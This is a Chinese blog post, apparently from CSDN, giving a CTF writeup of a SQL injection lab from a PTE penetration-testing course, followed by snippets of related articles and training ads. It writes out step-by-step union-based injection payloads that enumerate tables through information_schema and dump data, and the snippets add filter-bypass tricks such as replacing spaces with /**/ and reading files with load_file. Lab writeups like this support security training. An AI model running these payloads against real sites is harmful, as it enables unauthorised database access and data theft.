【PTE】承制科技培训SQL注入题目writeup

最新推荐文章于 2023-12-02 21:26:21 发布
最新推荐文章于 2023-12-02 21:26:21 发布
阅读量831 收藏
点赞数 1
分类专栏: SQL注入 PTE 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HkD01L/article/details/127974778
版权
本文介绍了承制科技的PTE培训课程中的CTF靶场,涉及多个SQL注入题目,包括0web_sql1、2.成绩单、基础题目一:二阶SQL注入等。通过绕过空格和特殊字符过滤,实现账号密码的非法验证,展示SQL注入攻击和防御技巧。
摘要由CSDN通过智能技术生成

零 靶场地址:CTF

这个靶场是承制科技的pte培训课程提供的靶场

一 0web_sql1

1.判断注入点
1' and 1=1 #
1' and 1=2 #

2.判断列数
1' order by 4 #
1' order by 5 #        此时数据没有输出,证明该表只有4列

3.联合查询
-1' union select 1,2,3,4 #

4.查数据库里所有的表名
-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() #
得知存在一个表flag

5.查询flag表中的列名
-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='flag' #
得知存在列Id,flag

6.查询flag列里的内容
-1' union select 1,2,3,group_concat(flag) from flag #

得到flag
最低0.47元/天 解锁文章
HkD01L
关注
专栏目录
PTE-day01 sql注入
samRsa
11-05 208
database() #数据库名称version() #数据库版本user() #数据库使用者group_concat() #将参数拼接到一行集中输出limit a,b #依次取值 从a+b的位置取b的值进行输出hex() #对参数进行16进制编码unhex() #对参数进行16进制解码into outfile() #向服务器写入指定的文件。
实验吧——SQL注入 Write up(一)
Lemon's blog
08-05 517
前言:之前学习过了联合注入查询、布尔盲注、时间盲注等,这次就通过实验吧的SQL注入题来加强一下。 简单的sql注入 输入有回显,且有输入框,那就可以用联合查询的方法来注入 题中提示已经过滤了一些关键字,那么就先来查看题中过滤的是哪些关键字 ?id=1 union select order by # 回显结果: union,select等都被过滤而且没有报错说明#也被过滤 可以自己建立一个语句...
简单的sql注入-实验吧 Writeup
KRDecad3的博客
11-08 617
简单的sql注入-实验吧 Writeup 看了网上很多Writeup,对过滤的解释有好几种,看的很迷糊,因此就自己实践实践,写下来整理一下思路。 题目链接 输入1,返回查询的ID和name: 然后输入1' 报错: 由此可知,存在字符型注入。 输入1' and 1=1--+,也会报错: 那么这里首先可以看到过滤掉了注释符, 不去闭合单引号:1 and 1=1 可以看到过滤掉了and和注释符。 ...
实验吧-简单的sql注入2 Writeup
baynk的博客
07-28 297
抓紧时间来搞,事情越来越多。。。 过程 输入1'后有报错,单引号闭合,尝试了--+和%23均无法注释,又试过了构造闭合,发现and和or也都用不了。加上这次只要被检测出来就直接就有提示界面,并不像上一个那样有信息可看,感觉挺麻烦的。 于是判断到底是如何被检测的,然后试过了双写,大小写啥的,都不行,于是我直接把所有的空格都去掉了,写成了1'and1='1,这次总算有提示了。 从上面就能看出来,如果...
合天网安实验室sql注入实验一 WRITE UP
夜车星繁的博客
11-15 532
在虚拟机chrome输入靶场网址: 10.1.1.11:81 打开实验一。 此时用到语句: name = root' and '1' = '1 name = root' and '1' = '2 接下来用order by 语句: root' order by 4%23 root' order by 5%23 root' order b...
mysql insert 注入_SQLMap Insert注入踩坑记
weixin_39773239的博客
02-01 1147
*本文原创作者:Conan,本文属 FreeBuf 原创奖励计划,未经许可禁止转载前言本篇文章是在做ctf bugku的一道sql insert盲注的题(题目地址:insert盲注)中踩到的坑,觉得还挺有趣的,于是便有了今天的文章,如有纰漏还望大佬们多多指正。进入主题1. 判断注入点明显的insert类型的注入,注入点在X-Forwarded-For,但关闭了错误提示并且没有回显,因此只能进行时间...
cisp-pte基础题目SQL注入
weixin_53313406的博客
11-25 3051
cisp-pte基础题目SQL注入(超详细)
CISP-PTE 练习题目-sql注入1
qq_29576929的博客
08-13 3173
sql注入
PTESQL注入(一)
HkD01L的博客
11-10 699
CISP-PTE国家注册信息安全渗透测试工程师课程笔记SQL注入 、联合查询注入、二阶注入、报错注入
基础题目SQL注入
king丶
07-31 1778
http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')--%20 这样执行一个结果,你会发现-- 没有起到注释的作用 说明这个地方不能使用空格 http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')# //#经过url编码变成%23 http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')%23 发现返回
CISP-PTE SQL注入 入门篇
beirry的博客
12-21 1502
经过上一篇的文章,相信大家也初步掌握了sql语句,现在我们就来学习SQL注入的攻击语句。 mysql在版本5之前,只能通过盲注来获取数据,mysql在版本5以后,可以获取信息的方式就很多了,因为含有默认的库:information_schema,这个库存储着mysql的结构信息。我们通过这个库来获取数据表名,字段名。 判断查询类型 select * from users where id=1 这个语句意思是查询users表中id为1的所有字段,当我把这个id的字段挖空,让这个字段可以用户自己输入。那么攻击
cisp-pteSQL注入题一
m0_58544284的博客
06-13 572
通过审题得知题目要求通过SQL注入漏洞读取网站/home/key文件,首先想到SQL语句“load_file()”通过提示发现#、–、空格等均被过滤,符号尝试url编码绕过,空格通过/**/可绕过。hunter搜索:body=“cisp-pte 认证考试” 获取免费靶场。审题时的事key在/home下,直接带入sql语句查询即可。重点在于过滤了union,使用双写即可绕过。点击进入答题,尝试get请求参数id=1。group by 4正常回显。group by 5回显报错。由此确认当前表的字段数为4。
为什么那么多人选择承制的CISP-PTE培训
aqpxrz的博客
03-26 5970
市面上做CISP-PTE认证培训的机构林林总总,为什么那么多人选择承制的CISP-PTE培训?各位做渗透测试的小伙伴不妨来跟我一起看一下: 强大的师资背景 1 授课老师实力雄厚 承制科技拥有多位资历非常丰富的CISP-PTE讲师,单从授课次数来讲,仅其中三位讲师加起来就有57次培训讲师的授课经历、参加过的项目/赛事支持总计43+次,其中不乏全国性网络安全赛事的冠军,更有讲师担任过国内网络安全赛事的出题人和裁判。 2 助教班主任尽心尽责 承制科技每个班级都配有助教和班主任,整个学习过...
CISP-PTE真题演示
热门推荐
weixin_48421613的博客
03-28 1万+
周末帮好兄弟做PTE的真题,觉得确实挺有意思的,于是就有了这篇文章,侵删侵删哈 第一阶段 基础题目一:SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 ​ 开始答题 这道题的有趣的地方就是,你先注册用户,不同于以往的360的PTE真题,并不是以admin用户去发表文章就能看到key,按照往常的先注册一个用户吧 可以看见,此时提示的代码显示过滤掉“#”、“–”​注释符号,我们先正常写一篇文章试试 可以看见,这是
CISP-PTE八套真题详解(侵删)
最新发布
00勇士王子的博客
12-02 7304
PTE八套模拟题详解,侵删
Bugku成绩查询:一次简单的SQL注入过程
xhxtalent的博客
10-20 527
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单。
MySql 高级查询 union 联合查询
qq_39286483的博客
01-09 316
1. union 联合查询 将多个查询结果集合到一起 2. 语法 select 查询语句 union select 查询语句 union select 查询语句 union select 查询语句 3. 例子: 查询学生信息和班级信息,集合到一起 select class_id,class_name,class_room from class UNION select name...
CISP-PTE实操练习讲解(二)
lza20001103的博客
07-06 3141
CISP-PTE实操练习讲解(二)
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值